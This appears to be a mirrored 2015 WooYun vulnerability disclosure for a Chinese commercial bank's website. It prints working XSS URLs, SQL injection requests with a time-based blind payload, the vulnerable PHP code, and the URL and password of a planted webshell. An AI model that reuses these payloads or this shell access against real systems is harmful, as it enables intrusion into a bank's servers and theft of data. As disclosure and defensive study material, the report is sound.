乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-26: 细节已通知厂商并且等待厂商处理中 2015-01-29: 厂商已经确认,细节仅向厂商公开 2015-02-08: 细节向核心白帽子及相关领域专家公开 2015-02-18: 细节向普通白帽子公开 2015-02-28: 细节向实习白帽子公开 2015-03-12: 细节向公众公开
吉林某商业银行多漏洞至拿下主站服务器
1、XSSxss1:
http://www.jtnsh.com/do/jsarticle.php?fid=45&iframeID=article_Newtopic_%3C/script%3E%3Cscript%3Eprompt%28943499%29%3C/script%3E&leng=28&rows=5&type=new
*****b4b583a8da7295f7c94e.png&qu*****
xss2:
http://www.jtnsh.com//member/homepage.php?uid=37_%3C/script%3E%3Cscript%3Eprompt%28935008%29%3C/script%3E
敏感信息泄露:A:
http://www.jtnsh.com/map/wdcx.php
B:
http://jtnsh.com/map/map.php
注入:sql1:参数:sheng
POST /map/map.php HTTP/1.1Content-Length: 58Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.jtnsh.com:80/Cookie: USR=rqvxglxn%090%091422240728%09http%3A%2F%2Fwww.jtnsh.com%2Fdo%2Flogin.php%3Ff; MIBEW_UserID=54c5a95f9dfd56.06927887; ECS_ID=6a1f8b22d14a3310bdf2ef4335481b37057ed5fa; ECS[visit_times]=1; ECS[history]=11%2C5%2C10; ECS[display]=grid; qq_fromurl=http%3A%2F%2Fwww.jtnsh.com%2Fdo%2Flogin.php; PHPSESSID=fompm8b3kphp3fpsg2bddrmc14Host: www.jtnsh.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*sheng=1
<?php include('public.php'); include('inc.php'); $sheng = $_POST['sheng']; if(!$sheng) {echo 404;}else{ $sql = "SELECT shi,xx,yy FROM `jt_form_content_9` WHERE shengfen='$sheng'"; mysql_query("set names utf8",$conn); $res = mysql_query($sql,$conn); while(@$row = mysql_fetch_assoc(@$res)) { $data[]=$row; } $data = (remove_duplicate($data)); echo JSON($data);}?>
sql2:参数:gjz,leixing,sheng,shi,四个参数皆存在
POST /map/wdcx.php HTTP/1.1Content-Length: 162Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.jtnsh.com:80/Cookie: USR=rqvxglxn%090%091422240728%09http%3A%2F%2Fwww.jtnsh.com%2Fdo%2Flogin.php%3Ff; MIBEW_UserID=54c5a95f9dfd56.06927887; ECS_ID=6a1f8b22d14a3310bdf2ef4335481b37057ed5fa; ECS[visit_times]=1; ECS[history]=11%2C5%2C10; ECS[display]=grid; qq_fromurl=http%3A%2F%2Fwww.jtnsh.com%2Fdo%2Flogin.php; PHPSESSID=fompm8b3kphp3fpsg2bddrmc14Host: www.jtnsh.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*gjz=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&leixing=0&sheng=0&shi=0
多图:
GETSHELL:一句话:http://www.jtnsh.com/map/bma.php 密码:bma
数据库:1、
2、
数据库备份文件:
登录服务器:
仅证明其危害
危害等级:高
漏洞Rank:17
确认时间:2015-01-29 15:20
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给吉林分中心,由吉林分中心后续协调网站管理单位处置。
暂无